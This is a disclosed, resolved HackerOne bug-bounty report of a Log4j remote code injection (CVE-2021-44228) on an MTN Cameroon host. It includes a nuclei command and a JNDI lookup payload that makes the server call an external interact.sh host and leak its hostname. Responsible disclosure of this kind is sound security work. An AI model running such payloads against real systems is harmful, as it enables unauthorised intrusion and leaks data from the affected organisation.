Remote code injection in Log4j on http://mtn1app.mtncameroon.net - CVE-2021-44228

Disclosed: 2024-08-24 11:29:12 By renzi To mtn_group
Critical
Vulnerability Details
###Summary Hello, I would to like report this security flaw on http://mtn1app.mtncameroon.net . Using script nuclei i can found CVE-2021-44228. This is a critical issue cause as remote command execution. On my test i just retrive hostname of machine via nuclei script. (https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml) ###Steps To Reproduce How we can reproduce the issue; 1. run nuclei script via cmd; ./nuclei -u http://mtn1app.mtncameroon.net:8080/ -t ../nuclei-templates/cves/2021/CVE-2021-44228.yaml It will retrive the hostname of machine on output " lastic-co1-nodes1.mtnnigeria.net" Like this; ```` http://mtn1app.mtncameroon.net:8080/?x=${jndi:ldap://${hostName}.c6s11oscca8f9pc2lrggcghbnjyyyybjg.interact.sh/a} [lastic-co1-nodes1.mtnnigeria.net] ```` This vulnerability is on port 8080 and 8443; * http://mtn1app.mtncameroon.net:8080 * https://mtn1app.mtncameroon.net:8443 ###Mitigation Update according the vendor and thecnical references.. ###References https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476 ## Impact Remote command execution
Actions
View on HackerOne
Report Stats
  • Report ID: 1425563
  • State: Closed
  • Substate: resolved
  • Upvotes: 14
Share this report